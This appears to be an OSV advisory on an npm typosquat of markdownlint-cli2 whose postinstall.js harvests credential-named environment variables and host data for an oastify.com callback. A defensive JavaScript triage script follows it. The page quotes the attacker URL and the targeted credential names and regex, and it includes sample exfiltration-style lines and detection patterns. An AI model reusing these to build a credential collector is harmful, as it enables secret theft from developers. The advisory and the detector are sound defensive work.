npm

markdownlint-cli2-fix @99.0.7

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6353

Ecosystem

npm

Summary

The package name 'markdownlint-cli2-fix' impersonates the popular 'markdownlint-cli2' linter but contains no linter functionality: the README states 'Takeover By lobo / For POC only', and the package ships only postinstall.js plus metadata.

postinstall.js (line 30) hardcodes BURP_COLLABORATOR_URL = "http://i0jvc03bvcjt40q39f5fx8671y72vxjm.oastify.com". When run, it collects host and network reconnaissance (os.hostname(), username, network interfaces, disk info, AD domain info, and the full process list via ps aux or tasklist through execSync), enumerates Object.keys(process.env) for variable names in a curated credential list (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN, STRIPE_SECRET, SSH_PRIVATE_KEY, DEPLOY_KEY, SLACK_TOKEN, DISCORD_TOKEN, JWT_SECRET) or matching the regex /_(TOKEN|SECRET|KEY|PASSWORD|PWD|APIKEY|API_KEY|PRIVATE_KEY)$/i, and POSTs the resulting JSON payload to the attacker-controlled Burp Collaborator endpoint at oastify.com.

package.json in this version does not declare a scripts.postinstall hook, so the file does not auto-execute on npm install. The package is nonetheless a deliberate typosquat with no legitimate purpose, the exfiltration code is fully functional, and any installer who is tricked into running the file, or any republish that wires the lifecycle hook, produces immediate credential exfiltration.

Source: amazon-inspector (ca7d5154ecbbcc636198bd2314e1916e5f0673d37ab7b14caca2ea96ad5ac5e1)
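The following is an added example, not code from the advisory, the package or amazon-inspector. It reproduces the credential-name matching quoted above so you can see which of your own CI variables such a collector would sweep up, and it flags the static indicators a reviewer would check for in a suspicious npm tarball: install-time lifecycle hooks, environment enumeration, shell execution, host reconnaissance calls, outbound HTTP, and out-of-band callback domains. The OAST domain list, the popular-name list used for the impersonation heuristic, and every sample input (package.json, source fragment, environment) are constructed assumptions; the source fragment contains only indicator lines, not a working payload.

```javascript
// Added example: static triage for the pattern described in the advisory.
// Not code from the advisory or the package. Domain list, popular-name list
// and all sample inputs are constructed assumptions.

// Curated names and suffix regex exactly as quoted in the advisory.
const CURATED_NAMES = new Set([
  'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'GITHUB_TOKEN', 'NPM_TOKEN',
  'STRIPE_SECRET', 'SSH_PRIVATE_KEY', 'DEPLOY_KEY', 'SLACK_TOKEN',
  'DISCORD_TOKEN', 'JWT_SECRET',
]);
const CREDENTIAL_SUFFIX = /_(TOKEN|SECRET|KEY|PASSWORD|PWD|APIKEY|API_KEY|PRIVATE_KEY)$/i;

// Names (never values) of the variables such a collector would exfiltrate.
function sweptEnvNames(env) {
  return Object.keys(env)
    .filter((k) => CURATED_NAMES.has(k) || CREDENTIAL_SUFFIX.test(k))
    .sort();
}

// Lifecycle scripts npm runs automatically when a dependency is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
function installHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string');
}

// Coarse impersonation heuristic: a popular name with a dash-delimited prefix
// or suffix bolted on (assumed list; expect false positives on legitimate
// plugin names such as eslint-plugin-*).
const POPULAR_NAMES = ['markdownlint-cli2', 'eslint', 'prettier'];
function impersonatedName(name, popular = POPULAR_NAMES) {
  const byLength = [...popular].sort((a, b) => b.length - a.length);
  return byLength.find((p) => name !== p &&
    (name.startsWith(p + '-') || name.endsWith('-' + p))) || null;
}

// Out-of-band callback domains used by OAST tooling (assumed list;
// oastify.com is the domain named in the advisory).
const OAST_DOMAINS = ['oastify.com', 'burpcollaborator.net', 'interact.sh'];
const OAST_RE = new RegExp(OAST_DOMAINS.map((d) => d.replace(/\./g, '\\.')).join('|'), 'i');

// Static indicators in one JS source file; each hit is { file, indicator }.
const SOURCE_CHECKS = [
  ['env-enumeration', /Object\.keys\(\s*process\.env\s*\)/],
  ['shell-exec', /\bexecSync\s*\(/],
  ['host-recon', /os\.(hostname|networkInterfaces|userInfo)\s*\(/],
  ['outbound-http', /\b(https?\.request|fetch|axios\.post)\s*\(/],
  ['oast-domain', OAST_RE],
];
function sourceIndicators(file, source) {
  return SOURCE_CHECKS.filter(([, re]) => re.test(source))
    .map(([indicator]) => ({ file, indicator }));
}

// Verdict: 'malicious-pattern' when exfil indicators and an install hook
// coincide; 'dormant-exfil' when the code is present but no hook wires it
// (the advisory's situation); 'review-hooks' for a hook alone; else 'clean'.
function triagePackage(pkg, files) {
  const hooks = installHooks(pkg);
  const hits = Object.entries(files)
    .filter(([file]) => file.endsWith('.js'))
    .flatMap(([file, src]) => sourceIndicators(file, src));
  const kinds = new Set(hits.map((h) => h.indicator));
  const exfil = kinds.has('oast-domain') ||
    (kinds.has('env-enumeration') && kinds.has('outbound-http'));
  let verdict = 'clean';
  if (exfil && hooks.length) verdict = 'malicious-pattern';
  else if (exfil) verdict = 'dormant-exfil';
  else if (hooks.length) verdict = 'review-hooks';
  return { verdict, hooks, impersonates: impersonatedName(pkg.name || ''), hits };
}

// Constructed inputs: a package.json with no lifecycle hook declared, as the
// advisory describes, and a source fragment holding only indicator lines.
const SAMPLE_PKG = { name: 'markdownlint-cli2-fix', version: '99.0.7' };
const SAMPLE_FILES = {
  'postinstall.js': [
    'const BURP_COLLABORATOR_URL = "http://constructed-example.oastify.com";',
    'const host = os.hostname();',
    'const names = Object.keys(process.env);',
    'const ps = execSync("ps aux").toString();',
    'https.request(BURP_COLLABORATOR_URL, { method: "POST" });',
  ].join('\n'),
  'package.json': '{}',
};
const SAMPLE_ENV = {
  PATH: '/usr/bin', HOME: '/home/ci', CI: 'true', REGISTRY_URL: 'x',
  NPM_TOKEN: 'x', GITHUB_TOKEN: 'x', DATABASE_PASSWORD: 'x',
  MY_SERVICE_API_KEY: 'x', SSH_AUTH_SOCK: '/tmp/agent.sock',
};

console.log(triagePackage(SAMPLE_PKG, SAMPLE_FILES));
console.log('env names swept:', sweptEnvNames(SAMPLE_ENV));
```

Two things worth noting from running it. First, the constructed package comes back as 'dormant-exfil' rather than 'malicious-pattern' because no install hook is declared, which is exactly why the advisory stresses that a republish wiring scripts.postinstall would turn the same file into immediate exfiltration; adding that key to SAMPLE_PKG flips the verdict. Second, the suffix regex is broad: a variable such as MY_SERVICE_API_KEY or DATABASE_PASSWORD is swept even though it is on no curated list, while SSH_AUTH_SOCK is not, so the set of names this returns for a real CI environment is the realistic blast radius of an install-time collector, not just the ten hardcoded names.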
